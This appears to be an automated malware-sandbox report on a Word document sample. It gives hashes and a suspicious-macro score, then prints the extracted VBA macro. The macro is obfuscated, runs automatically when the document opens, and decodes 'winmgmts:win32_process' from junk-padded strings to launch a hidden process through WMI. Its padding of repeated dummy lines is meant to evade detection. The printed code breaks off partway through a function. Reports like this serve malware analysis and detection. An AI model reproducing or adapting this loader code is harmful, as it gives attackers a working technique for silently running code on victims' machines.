71798c1415bd2c656552ec32c9835538_JaffaCakes118

Sharing

Copy URL

Twitter E-mail

General

Target

71798c1415bd2c656552ec32c9835538_JaffaCakes118
Size

187KB
MD5

71798c1415bd2c656552ec32c9835538
SHA1

51702d9597e77b881c90467455c6479d6a8b7774
SHA256

0ed1adf222903a5b3335427d554d4a74c05a27cfd1a438788c04f3b3d720c002
SHA512

fcaaeaa1556acb2d5181f9ea0706b0d65240f3d118ca5c81cdb22361b908571aae7b9e9164ef730feaa9c97729c5e692973639e2bc9273a410f5d3329b4cd64f
SSDEEP

1536:RGGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xilATmd8YkYeT/EA8sap8cjufajnG:vrfrzOH98ipgEh5JYR

Score

8^/10

macro

Malware Config

Signatures

Suspicious Office macro 1 IoCs

Office document equipped with macros.

macro

resource
sample

Files

71798c1415bd2c656552ec32c9835538_JaffaCakes118
.doc windows office2003

Hkuh37ff65vihiqh1z

1

Attribute VB_Name = "Hkuh37ff65vihiqh1z"

2

Attribute VB_Base = "1Normal.ThisDocument"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = True

8

Attribute VB_Customizable = True

9

Private Sub _

10

Document_open()

11

Pwvbmsznepk6 = Array(Iammmppvp5y5o1ru + "T6daquiwsymb_bZkp6rtahlyf38i93h5 Rp3x8qd162ctq4z6" + Hwc81y3mk3l, O7ehkmuhytpn4, V498mqcl653i20qsx6.Ycbfdzqm8odffce84, Mie1_io5rw24 + "T_kwy4nk60lfqexq3g Cugthv4c02osrro4 J82vp7wk4uue J1pb1pvrcb71ouqq6")

12

End Sub

13

14

V498mqcl653i20qsx6

1

Attribute VB_Name = "V498mqcl653i20qsx6"

2

Attribute VB_Base = "0{B47E803E-2AAD-4688-88B5-F0ADC09813B7}{DF7C6934-9AF5-4B58-A831-6A5FF5CA9AC4}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = False

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = False

9

Function Ycbfdzqm8odffce84()

10

On Error Resume Next

11

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

12

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

13

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

14

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

15

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

16

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

17

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

18

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

19

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

20

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

21

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

22

OOijpW = Mid(BnbGuGVJS, 1, 1)

23

pQfRfj = Mid(BnbGuGVJS, 286, 1)

24

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

25

jpOSVN = Mid(BnbGuGVJS, 172, 1)

26

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

27

Va0ll0y95y4np0jqv = 90

28

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

29

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

30

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

31

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

32

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

33

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

34

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

35

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

36

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

37

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

38

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

39

OOijpW = Mid(BnbGuGVJS, 1, 1)

40

pQfRfj = Mid(BnbGuGVJS, 286, 1)

41

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

42

jpOSVN = Mid(BnbGuGVJS, 172, 1)

43

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

44

Yb1w542hz0o = Ikmof_53bhlvt41 + Chr$(Va0ll0y95y4np0jqv + (25))

45

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

46

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

47

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

48

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

49

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

50

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

51

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

52

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

53

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

54

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

55

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

56

OOijpW = Mid(BnbGuGVJS, 1, 1)

57

pQfRfj = Mid(BnbGuGVJS, 286, 1)

58

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

59

jpOSVN = Mid(BnbGuGVJS, 172, 1)

60

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

61

R7qrwbdqual = "PIZDECPIZDECwPIZDECiPIZDECnmPIZDECPIZDECgmPIZDECtPIZDECPIZDEC" + Yb1w542hz0o + "PIZDECPIZDEC:PIZDECwPIZDECinPIZDECPIZDEC3PIZDEC2PIZDEC_PIZDEC" + V498mqcl653i20qsx6.Punye00muikn6j + "PIZDECroPIZDECPIZDECcePIZDECsPIZDECsPIZDEC"

62

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

63

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

64

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

65

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

66

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

67

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

68

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

69

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

70

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

71

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

72

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

73

OOijpW = Mid(BnbGuGVJS, 1, 1)

74

pQfRfj = Mid(BnbGuGVJS, 286, 1)

75

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

76

jpOSVN = Mid(BnbGuGVJS, 172, 1)

77

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

78

H7xdqcu0aczn2t = Bm1urvrrjwck_j(R7qrwbdqual)

79

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

80

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

81

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

82

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

83

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

84

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

85

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

86

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

87

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

88

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

89

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

90

OOijpW = Mid(BnbGuGVJS, 1, 1)

91

pQfRfj = Mid(BnbGuGVJS, 286, 1)

92

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

93

jpOSVN = Mid(BnbGuGVJS, 172, 1)

94

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

95

Set P0ib2k3xgl6k = CreateObject(H7xdqcu0aczn2t)

96

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

97

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

98

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

99

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

100

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

101

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

102

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

103

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

104

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

105

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

106

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

107

OOijpW = Mid(BnbGuGVJS, 1, 1)

108

pQfRfj = Mid(BnbGuGVJS, 286, 1)

109

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

110

jpOSVN = Mid(BnbGuGVJS, 172, 1)

111

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

112

Smv7yek3do3x = On6hq7ksdd439 + H7xdqcu0aczn2t + Yb1w542hz0o + V498mqcl653i20qsx6.Lbp6qfyyhejr + V498mqcl653i20qsx6.N3h_ty6bmu1z35mk

113

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

114

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

115

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

116

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

117

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

118

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

119

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

120

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

121

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

122

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

123

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

124

OOijpW = Mid(BnbGuGVJS, 1, 1)

125

pQfRfj = Mid(BnbGuGVJS, 286, 1)

126

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

127

jpOSVN = Mid(BnbGuGVJS, 172, 1)

128

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

129

Set Bx4q7333q0nae9 = Qe0607qsk5qjzwjucx(Smv7yek3do3x + V498mqcl653i20qsx6.Punye00muikn6j)

130

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

131

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

132

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

133

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

134

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

135

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

136

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

137

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

138

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

139

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

140

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

141

OOijpW = Mid(BnbGuGVJS, 1, 1)

142

pQfRfj = Mid(BnbGuGVJS, 286, 1)

143

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

144

jpOSVN = Mid(BnbGuGVJS, 172, 1)

145

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

146

P0ib2k3xgl6k.Create X0uqsty6g04n0l, Arf7d8uvufxlsj8, Bx4q7333q0nae9

147

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

148

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

149

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

150

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

151

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

152

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

153

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

154

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

155

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

156

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

157

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

158

OOijpW = Mid(BnbGuGVJS, 1, 1)

159

pQfRfj = Mid(BnbGuGVJS, 286, 1)

160

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

161

jpOSVN = Mid(BnbGuGVJS, 172, 1)

162

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

163

End Function

164

Function Qe0607qsk5qjzwjucx(Dr4ekh7cd6fro)

165

On Error Resume Next

166

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

167

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

168

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

169

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

170

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

171

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

172

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

173

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

174

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

175

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

176

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

177

OOijpW = Mid(BnbGuGVJS, 1, 1)

178

pQfRfj = Mid(BnbGuGVJS, 286, 1)

179

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

180

jpOSVN = Mid(BnbGuGVJS, 172, 1)

181

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

182

Set Qe0607qsk5qjzwjucx = CreateObject(Dr4ekh7cd6fro)

183

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

184

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

185

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

186

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

187

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

188

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

189

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

190

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

191

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

192

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

193

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

194

OOijpW = Mid(BnbGuGVJS, 1, 1)

195

pQfRfj = Mid(BnbGuGVJS, 286, 1)

196

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

197

jpOSVN = Mid(BnbGuGVJS, 172, 1)

198

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

199

Qe0607qsk5qjzwjucx. _

200

showwindow = wdKeyEquals - wdKeyEquals

201

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

202

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

203

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

204

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

205

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

206

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

207

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

208

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

209

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

210

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

211

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

212

OOijpW = Mid(BnbGuGVJS, 1, 1)

213

pQfRfj = Mid(BnbGuGVJS, 286, 1)

214

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

215

jpOSVN = Mid(BnbGuGVJS, 172, 1)

216

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

217

End Function

218

Function Bm1urvrrjwck_j(K21xh9jhqnwtowdfy6)

219

On Error Resume Next

220

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

221

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

222

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

223

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

224

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

225

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

226

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

227

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

228

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

229

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

230

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

231

OOijpW = Mid(BnbGuGVJS, 1, 1)

232

pQfRfj = Mid(BnbGuGVJS, 286, 1)

233

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

234

jpOSVN = Mid(BnbGuGVJS, 172, 1)

235

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

236

Y8knvv8sxgmyrzpp = CleanString(K21xh9jhqnwtowdfy6)

237

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

238

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

239

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

240

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

241

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

242

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

243

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

244

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

245

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

246

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

247

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

248

OOijpW = Mid(BnbGuGVJS, 1, 1)

249

pQfRfj = Mid(BnbGuGVJS, 286, 1)

250

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

251

jpOSVN = Mid(BnbGuGVJS, 172, 1)

252

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

253

Dcbtn1q5azyd5nxfnb = Split(Y8knvv8sxgmyrzpp, "PIZDEC")

254

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

255

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

256

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

257

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

258

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

259

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

260

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

261

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

262

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

263

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

264

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

265

OOijpW = Mid(BnbGuGVJS, 1, 1)

266

pQfRfj = Mid(BnbGuGVJS, 286, 1)

267

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

268

jpOSVN = Mid(BnbGuGVJS, 172, 1)

269

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

270

Q0reh6unb63jd9f04 = Tw7vda69gqa6lchb5r + Join(Dcbtn1q5azyd5nxfnb, Vqy15104zven)

271

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

272

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

273

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

274

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

275

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

276

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

277

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

278

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

279

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

280

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

281

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

282

OOijpW = Mid(BnbGuGVJS, 1, 1)

283

pQfRfj = Mid(BnbGuGVJS, 286, 1)

284

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

285

jpOSVN = Mid(BnbGuGVJS, 172, 1)

286

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

287

Bm1urvrrjwck_j = Q0reh6unb63jd9f04

288

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

289

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

290

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

291

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

292

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

293

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

294

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

295

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

296

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

297

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

298

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

299

OOijpW = Mid(BnbGuGVJS, 1, 1)

300

pQfRfj = Mid(BnbGuGVJS, 286, 1)

301

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

302

jpOSVN = Mid(BnbGuGVJS, 172, 1)

303

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

304

End Function

305

Function X0uqsty6g04n0l()

306

On Error Resume Next

307

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

308

